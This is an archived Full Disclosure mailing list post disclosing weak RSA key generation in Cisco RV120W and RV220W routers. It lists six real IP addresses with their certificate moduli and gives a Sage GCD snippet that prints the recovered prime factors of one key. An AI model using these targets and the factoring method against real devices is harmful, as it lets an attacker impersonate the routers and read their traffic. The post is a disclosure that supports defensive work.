Full Disclosure mailing list archives
Cisco RVxxxW wireless routers weak RSA key generation
From: Sławek Rozbicki <slawek () rozbicki eu>
Date: Tue, 8 Jan 2013 10:57:11 +0100
During the 83/8 subnet x509 research I've noticed that some of Cisco RVxxxW devices share same primes in RSA modules. It is possible to regenerate private key with ease using fast GCD (euklid based) operations on public key pairs. Issuer field contains information about device type: Cisco RV120W & RV220W. --- 83.3.225.142 /CN=2C542D391481/OU=RV220W/O=Cisco Systems, Inc./C=US /CN=2C542D391481/OU=RV220W/O=Cisco Systems, Inc./C=US modulus1=DDE9C65105E787B41BCDE525321ABEE6023351DB29FF1482705FE5E817EA2B64E86FC88C33405F2B64CB505058258508C29C42A26310E37D17816C55272A3DF7356A2184D56C39ED44BD95F6CD2028EB53B19D9CA55D90258690C7382347D81594B4475EAA680E03AC006982FE5F9CD8A76FE3A0145B99B6F3F8AB6A1EFAA891 --- 83.31.223.35 /CN=30E4DB8C6009/OU=RV220W/O=Cisco Systems, Inc./C=US /CN=30E4DB8C6009/OU=RV220W/O=Cisco Systems, Inc./C=US modulus2=CB7520F6FECFD1D3D2AAB8B71AA56CEDA9041DE130EE857C1BC1C1E289E1DDF6DC4CFF2289F3510F6671281CC2AD4DEE4FA69808E9C73D56724F8BF6CF0419C3D386F042CAD4223A52F8F2B05AA47029135A74FD1356F1248B61F5F630FFA8BCAF7896FFC4777AFB795899FE29E298B66E59253D8255CD4F4C77E5F0DF1CF15D --- 83.64.13.157 /CN=5475D083EDBF/OU=RV120W/O=Cisco Systems, Inc./C=US /CN=5475D083EDBF/OU=RV120W/O=Cisco Systems, Inc./C=US modulus3=E84014187A1732FDCCDD093DC5C2493DE0B4039C0B2FB0E9BB1C18BE6AE13DF5FF1D2CEED3DF193619CA155FA2DFBCFE60D0FD5DA4BE0DC11F760F4E36569AA8A4AE48293E7C02B42FDA94FD9C864A30449B2FB203503E3F91BF1608FB94B71BE57ED130FC5328F0C7ADED7A78F805493AC5F05C3063F11B11DA5793F12FDDD5 --- 83.115.0.102 /CN=E05FB90C8337/OU=RV220W/O=Cisco Systems, Inc./C=US /CN=E05FB90C8337/OU=RV220W/O=Cisco Systems, Inc./C=US modulus4=B6A8683C4904F42909C6C0EDB62CC23AA303254F1BB212FD0B027635B701D48502C872919E057D00BA13DD761D5B85AAADC3F71B592EA6FBDB597B12062964E9C0008EF3C877E1CF42FA46B934A378E532563184F5DD85B82722753C67FC4686C7ACE38A299163E7E46C3CCD351F60F77058F8A4C130C5E1971D82CD69470137 --- 83.183.190.88 /CN=70CA9B9A2FB9/OU=RV220W/O=Cisco Systems, Inc./C=US /CN=70CA9B9A2FB9/OU=RV220W/O=Cisco Systems, Inc./C=US modulus5=E5DFFAD88132440471963BCD892F8F07CD81C59DDC48FB5EBA9DB81210C363186A71B6BC8DC4D2831E89164A186F32112E3D83D246D8F1F9BCB38FD68A9C5CDD90EE252B8E3E49C9A3DE1B94F623C617DDAE4F88C6EB357AB93DEE2A6A1DFE54789A05CFFCE238C60A517E8396A8AFFD049FA7AC49A74C113F8F2B8E916B749B --- 83.240.76.18 /CN=5475D083F18F/OU=RV120W/O=Cisco Systems, Inc./C=US /CN=5475D083F18F/OU=RV120W/O=Cisco Systems, Inc./C=US modulus6=D46F6539E22616F723B19CA0C5CF5D50C3261AE9E745DAA9E5E6FE97B32835BFAEE5521698859D780FBE0D5359C59C7D50ECBE225B6A3A54B8DAACF3ACD0E6D73870529976CA3381EB5C662AA906995D6B7B30E517F7A823418A0CC9EC5CD58FD29998918D1C1583E966A9E7949F6D39DBC6CA7DF26F9EC31AF9781882BA1FAD --- Sage example: sage: shared_prime = gcd(int(modulus1, 16), int (modulus5, 16)) p1 = shared_prime q1 = int(modulus1, 16) / p1 p1, q1, p1*q1 (12499192433944213781964942843618609822425039145052853332296250924623852881553214592304077608523545660277486701486836494007466150831257304740197719090109033, 12467424348726819445887790699943735854402415241791247762494630183745045172659286153011191677004819818143512535707572760398177810526302338217312935436896233, 155832736090378128697871091112590904224554126152705026739669505216228645581087337554005500084035733074584019224807541210146848049519545937176568098670490593360508034088835934717657399028135252803788838857215199111453506414008787541666251986330567501515332545894446368462679367017260653321704576902679076972689) -- Slawomir Rozbicki
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Cisco RVxxxW wireless routers weak RSA key generation Sławek Rozbicki (Jan 08)